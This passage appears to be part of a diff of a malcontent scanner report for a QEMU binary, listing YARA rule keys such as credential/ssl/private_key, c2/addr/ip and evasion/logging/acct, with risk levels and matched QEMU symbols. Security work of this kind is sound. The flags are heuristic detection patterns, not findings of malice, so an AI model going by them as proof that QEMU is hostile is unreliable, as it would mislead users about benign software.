[SetPasswordAction_lookup](https://github.com/search?q=SetPasswordAction_lookup&type=code)
[change-vnc-password](https://github.com/search?q=change-vnc-password&type=code)
[enter_expire_password](https://github.com/search?q=enter_expire_password&type=code)
[exit_change_vnc_password](https://github.com/search?q=exit_change_vnc_password&type=code)
[hmp_expire_password](https://github.com/search?q=hmp_expire_password&type=code)
[hmp_set_password](https://github.com/search?q=hmp_set_password&type=code)
[marshal_expire_password](https://github.com/search?q=marshal_expire_password&type=code)
[monitor_read_password](https://github.com/search?q=monitor_read_password&type=code)
[not support password prompting](https://github.com/search?q=not+support+password+prompting&type=code)
[obj_change_vnc_password_arg_members](https://github.com/search?q=obj_change_vnc_password_arg_members&type=code)
[password is expired](https://github.com/search?q=password+is+expired&type=code)
[password is not set](https://github.com/search?q=password+is+not+set&type=code)
[please enable password auth using](https://github.com/search?q=please+enable+password+auth+using&type=code)
[prop_get_passwordid](https://github.com/search?q=prop_get_passwordid&type=code)
[prop_set_passwordid](https://github.com/search?q=prop_set_passwordid&type=code)
[protocol password](https://github.com/search?q=protocol+password&type=code)
[proxy-password-secret](https://github.com/search?q=proxy-password-secret&type=code)
[qapi_free_ExpirePasswordOptionsVnc](https://github.com/search?q=qapi_free_ExpirePasswordOptionsVnc&type=code)
[qapi_free_SetPasswordOptionsVnc](https://github.com/search?q=qapi_free_SetPasswordOptionsVnc&type=code)
[qmp_change_vnc_password](https://github.com/search?q=qmp_change_vnc_password&type=code)
[qmp_enter_set_password](https://github.com/search?q=qmp_enter_set_password&type=code)
[qmp_exit_expire_password](https://github.com/search?q=qmp_exit_expire_password&type=code)
[qmp_exit_set_password](https://github.com/search?q=qmp_exit_set_password&type=code)
[qmp_expire_password](https://github.com/search?q=qmp_expire_password&type=code)
[qmp_marshal_set_password](https://github.com/search?q=qmp_marshal_set_password&type=code)
[qmp_set_password](https://github.com/search?q=qmp_set_password&type=code)
[that match this password](https://github.com/search?q=that+match+this+password&type=code)
[type_ExpirePasswordOptionsVnc](https://github.com/search?q=type_ExpirePasswordOptionsVnc&type=code)
[type_ExpirePasswordOptions_members](https://github.com/search?q=type_ExpirePasswordOptions_members&type=code)
[visit_type_SetPasswordAction](https://github.com/search?q=visit_type_SetPasswordAction&type=code)
[visit_type_SetPasswordOptionsVnc](https://github.com/search?q=visit_type_SetPasswordOptionsVnc&type=code)
[visit_type_SetPasswordOptions_members](https://github.com/search?q=visit_type_SetPasswordOptions_members&type=code)
[vnc password expire-time](https://github.com/search?q=vnc+password+expire-time&type=code)
[vnc_display_password](https://github.com/search?q=vnc_display_password&type=code) | -| LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [private_key](https://github.com/search?q=private_key&type=code) | -| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code) | -| LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [crypto/tls](https://github.com/search?q=crypto%2Ftls&type=code) | -| LOW | [data/compression/bzip2](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/bzip2.yara#bzip2) | Works with bzip2 files | [bzip2](https://github.com/search?q=bzip2&type=code) | -| LOW | [data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip) | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | -| LOW | [data/compression/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zstd.yara#zstd) | Zstandard: fast real-time compression algorithm | [ZSTD_decompressStream](https://github.com/search?q=ZSTD_decompressStream&type=code)
[zstd](https://github.com/search?q=zstd&type=code) | -| LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | -| LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [md5:](https://github.com/search?q=md5%3A&type=code) | -| LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | -| LOW | [discover/process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | -| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | -| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [evasion/logging/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/acct.yara#acct) | switch process accounting on or off | [acct](https://github.com/search?q=acct&type=code) | -| LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [Could not load plugin](https://github.com/search?q=Could+not+load+plugin&type=code)
[Plugin options](https://github.com/search?q=Plugin+options&type=code)
[cap_disas_plugin](https://github.com/search?q=cap_disas_plugin&type=code)
[gen_plugin_u64_ptr](https://github.com/search?q=gen_plugin_u64_ptr&type=code)
[load a plugin](https://github.com/search?q=load+a+plugin&type=code)
[op_plugin](https://github.com/search?q=op_plugin&type=code)
[output from TCG plugins](https://github.com/search?q=output+from+TCG+plugins&type=code)
[plugin file](https://github.com/search?q=plugin+file&type=code)
[plugin_add_dyn_cb_arr](https://github.com/search?q=plugin_add_dyn_cb_arr&type=code)
[plugin_atexit_cb](https://github.com/search?q=plugin_atexit_cb&type=code)
[plugin_bool_parse](https://github.com/search?q=plugin_bool_parse&type=code)
[plugin_cb__udata](https://github.com/search?q=plugin_cb__udata&type=code)
[plugin_cond_to_tcgcond](https://github.com/search?q=plugin_cond_to_tcgcond&type=code)
[plugin_disas](https://github.com/search?q=plugin_disas&type=code)
[plugin_dyn_cb_arr_cmp](https://github.com/search?q=plugin_dyn_cb_arr_cmp&type=code)
[plugin_end_code](https://github.com/search?q=plugin_end_code&type=code)
[plugin_entry_code](https://github.com/search?q=plugin_entry_code&type=code)
[plugin_flush_cb](https://github.com/search?q=plugin_flush_cb&type=code)
[plugin_flush_destroy](https://github.com/search?q=plugin_flush_destroy&type=code)
[plugin_from_name](https://github.com/search?q=plugin_from_name&type=code)
[plugin_gen_disable_mem](https://github.com/search?q=plugin_gen_disable_mem&type=code)
[plugin_gen_inject](https://github.com/search?q=plugin_gen_inject&type=code)
[plugin_gen_insn_end](https://github.com/search?q=plugin_gen_insn_end&type=code)
[plugin_gen_insn_start](https://github.com/search?q=plugin_gen_insn_start&type=code)
[plugin_gen_mem](https://github.com/search?q=plugin_gen_mem&type=code)
[plugin_gen_tb_end](https://github.com/search?q=plugin_gen_tb_end&type=code)
[plugin_gen_tb_start](https://github.com/search?q=plugin_gen_tb_start&type=code)
[plugin_get_dyn_cb](https://github.com/search?q=plugin_get_dyn_cb&type=code)
[plugin_get_hwaddr](https://github.com/search?q=plugin_get_hwaddr&type=code)
[plugin_get_registers](https://github.com/search?q=plugin_get_registers&type=code)
[plugin_hwaddr_is_io](https://github.com/search?q=plugin_hwaddr_is_io&type=code)
[plugin_init](https://github.com/search?q=plugin_init&type=code)
[plugin_insn_data](https://github.com/search?q=plugin_insn_data&type=code)
[plugin_insn_disas](https://github.com/search?q=plugin_insn_disas&type=code)
[plugin_insn_haddr](https://github.com/search?q=plugin_insn_haddr&type=code)
[plugin_insn_size](https://github.com/search?q=plugin_insn_size&type=code)
[plugin_insn_symbol](https://github.com/search?q=plugin_insn_symbol&type=code)
[plugin_insn_vaddr](https://github.com/search?q=plugin_insn_vaddr&type=code)
[plugin_list](https://github.com/search?q=plugin_list&type=code)
[plugin_load_list](https://github.com/search?q=plugin_load_list&type=code)
[plugin_mem_is_store](https://github.com/search?q=plugin_mem_is_store&type=code)
[plugin_mem_size_shift](https://github.com/search?q=plugin_mem_size_shift&type=code)
[plugin_num_vcpus](https://github.com/search?q=plugin_num_vcpus&type=code)
[plugin_opt_parse](https://github.com/search?q=plugin_opt_parse&type=code)
[plugin_path_to_binary](https://github.com/search?q=plugin_path_to_binary&type=code)
[plugin_print_address](https://github.com/search?q=plugin_print_address&type=code)
[plugin_read_register](https://github.com/search?q=plugin_read_register&type=code)
[plugin_register_atexit](https://github.com/search?q=plugin_register_atexit&type=code)
[plugin_register_cb](https://github.com/search?q=plugin_register_cb&type=code)
[plugin_register_dyn_cb](https://github.com/search?q=plugin_register_dyn_cb&type=code)
[plugin_register_inline](https://github.com/search?q=plugin_register_inline&type=code)
[plugin_reset_destroy](https://github.com/search?q=plugin_reset_destroy&type=code)
[plugin_reset_uninstall](https://github.com/search?q=plugin_reset_uninstall&type=code)
[plugin_scoreboard_find](https://github.com/search?q=plugin_scoreboard_find&type=code)
[plugin_scoreboard_free](https://github.com/search?q=plugin_scoreboard_free&type=code)
[plugin_scoreboard_new](https://github.com/search?q=plugin_scoreboard_new&type=code)
[plugin_start_code](https://github.com/search?q=plugin_start_code&type=code)
[plugin_tb_get_insn](https://github.com/search?q=plugin_tb_get_insn&type=code)
[plugin_tb_n_insns](https://github.com/search?q=plugin_tb_n_insns&type=code)
[plugin_tb_trans_cb](https://github.com/search?q=plugin_tb_trans_cb&type=code)
[plugin_tb_vaddr](https://github.com/search?q=plugin_tb_vaddr&type=code)
[plugin_uninstall](https://github.com/search?q=plugin_uninstall&type=code)
[plugin_update_ns](https://github.com/search?q=plugin_update_ns&type=code)
[plugin_user_exit](https://github.com/search?q=plugin_user_exit&type=code)
[plugin_user_postfork](https://github.com/search?q=plugin_user_postfork&type=code)
[plugin_vcpu_cb__simple](https://github.com/search?q=plugin_vcpu_cb__simple&type=code)
[plugin_vcpu_exit_hook](https://github.com/search?q=plugin_vcpu_exit_hook&type=code)
[plugin_vcpu_for_each](https://github.com/search?q=plugin_vcpu_for_each&type=code)
[plugin_vcpu_idle_cb](https://github.com/search?q=plugin_vcpu_idle_cb&type=code)
[plugin_vcpu_init_hook](https://github.com/search?q=plugin_vcpu_init_hook&type=code)
[plugin_vcpu_mem_cb](https://github.com/search?q=plugin_vcpu_mem_cb&type=code)
[plugin_vcpu_resume_cb](https://github.com/search?q=plugin_vcpu_resume_cb&type=code)
[plugin_vcpu_syscall](https://github.com/search?q=plugin_vcpu_syscall&type=code)
[qemu_plugin_add_dyn](https://github.com/search?q=qemu_plugin_add_dyn&type=code)
[qemu_plugin_install](https://github.com/search?q=qemu_plugin_install&type=code)
[qemu_plugin_opts](https://github.com/search?q=qemu_plugin_opts&type=code)
[qemu_plugin_outs](https://github.com/search?q=qemu_plugin_outs&type=code)
[qemu_plugin_path_to](https://github.com/search?q=qemu_plugin_path_to&type=code)
[qemu_plugin_request](https://github.com/search?q=qemu_plugin_request&type=code)
[qemu_plugin_reset](https://github.com/search?q=qemu_plugin_reset&type=code)
[qemu_plugin_u64_add](https://github.com/search?q=qemu_plugin_u64_add&type=code)
[qemu_plugin_u64_get](https://github.com/search?q=qemu_plugin_u64_get&type=code)
[qemu_plugin_u64_set](https://github.com/search?q=qemu_plugin_u64_set&type=code)
[qemu_plugin_u64_sum](https://github.com/search?q=qemu_plugin_u64_sum&type=code)
[qemu_plugin_version](https://github.com/search?q=qemu_plugin_version&type=code)
[tcg_gen_plugin_cb](https://github.com/search?q=tcg_gen_plugin_cb&type=code)
[tcg_gen_plugin_mem_cb](https://github.com/search?q=tcg_gen_plugin_mem_cb&type=code)
[tlb_plugin_lookup](https://github.com/search?q=tlb_plugin_lookup&type=code) | -| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | -| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | -| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | -| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | -| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | -| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlinkat](https://github.com/search?q=readlinkat&type=code) | -| LOW | [fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount) | mounts file systems | [-o](https://github.com/search?q=-o&type=code)
[mount](https://github.com/search?q=mount&type=code) | -| LOW | [fs/node_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/node-create.yara#mknod) | [create device files](https://man7.org/linux/man-pages/man2/mknod.2.html) | [mknod](https://github.com/search?q=mknod&type=code) | -| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/qemu-ifdown](https://github.com/search?q=%2Fetc%2Fqemu-ifdown&type=code)
[/etc/qemu-ifup](https://github.com/search?q=%2Fetc%2Fqemu-ifup&type=code)
[/etc/qemu/qemu.conf](https://github.com/search?q=%2Fetc%2Fqemu%2Fqemu.conf&type=code) | -| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/tmp](https://github.com/search?q=%2Fvar%2Ftmp&type=code) | -| LOW | [fs/permission/chown](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-chown.yara#fchownat) | May change file ownership | [fchownat](https://github.com/search?q=fchownat&type=code) | -| LOW | [fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | -| LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) | -| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | -| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code) | -| LOW | [net/ip/multicast_send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-multicast-send.yara#multicast) | [send data to multiple nodes simultaneously](https://en.wikipedia.org/wiki/IP_multicast) | [multicast](https://github.com/search?q=multicast&type=code) | -| LOW | [net/ip/send_unicast](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-send-unicast.yara#unicast) | send data to the internet | [unicast](https://github.com/search?q=unicast&type=code) | -| LOW | [net/resolve/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostname-resolve.yara#gethostbyname) | [resolve network host name to IP address](https://linux.die.net/man/3/gethostbyname) | [gethostbyname](https://github.com/search?q=gethostbyname&type=code) | -| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | -| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | -| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | -| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) | -| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code)
[sendto](https://github.com/search?q=sendto&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://qemu.org/contribute/report-a-bug](https://qemu.org/contribute/report-a-bug)
[https://wiki.qemu.org/Documentation/9psetup](https://wiki.qemu.org/Documentation/9psetup) | -| LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_wait](https://github.com/search?q=epoll_wait&type=code) | -| LOW | [os/kernel/seccomp](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/seccomp.yara#seccomp) | [operate on Secure Computing state of the process](https://man7.org/linux/man-pages/man2/seccomp.2.html) | [seccomp](https://github.com/search?q=seccomp&type=code) | -| LOW | [process/chroot](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chroot.yara#chroot) | change the location of root for the process | [chroot](https://github.com/search?q=chroot&type=code) | -| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | -| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | -| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | -| LOW | [process/unshare](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/unshare.yara#syscall_unshare) | disassociate parts of the process execution context | [unshare](https://github.com/search?q=unshare&type=code) | -| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current 
process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|--------|---------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| HIGH | [crypto/xor](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/xor.yara#xor_decode_encode) | decodes/encodes XOR content | [Opcode_xor_encode_fns](https://github.com/search?q=Opcode_xor_encode_fns&type=code) | +| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code)
[Port](https://github.com/search?q=Port&type=code)
[add_port](https://github.com/search?q=add_port&type=code)
[ahci_port](https://github.com/search?q=ahci_port&type=code)
[and_port](https://github.com/search?q=and_port&type=code)
[be_port](https://github.com/search?q=be_port&type=code)
[claim_port](https://github.com/search?q=claim_port&type=code)
[clear_port](https://github.com/search?q=clear_port&type=code)
[compare_ip](https://github.com/search?q=compare_ip&type=code)
[ehci_port](https://github.com/search?q=ehci_port&type=code)
[extract_ip](https://github.com/search?q=extract_ip&type=code)
[find_port](https://github.com/search?q=find_port&type=code)
[fix_port](https://github.com/search?q=fix_port&type=code)
[get_ip](https://github.com/search?q=get_ip&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[handle_port](https://github.com/search?q=handle_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[hub_port](https://github.com/search?q=hub_port&type=code)
[megasas_port](https://github.com/search?q=megasas_port&type=code)
[mem_port](https://github.com/search?q=mem_port&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[metadata_ip](https://github.com/search?q=metadata_ip&type=code)
[mmio_port](https://github.com/search?q=mmio_port&type=code)
[mptsas_port](https://github.com/search?q=mptsas_port&type=code)
[ohci_port](https://github.com/search?q=ohci_port&type=code)
[pcie_port](https://github.com/search?q=pcie_port&type=code)
[register_port](https://github.com/search?q=register_port&type=code)
[release_port](https://github.com/search?q=release_port&type=code)
[remove_port](https://github.com/search?q=remove_port&type=code)
[reset_port](https://github.com/search?q=reset_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
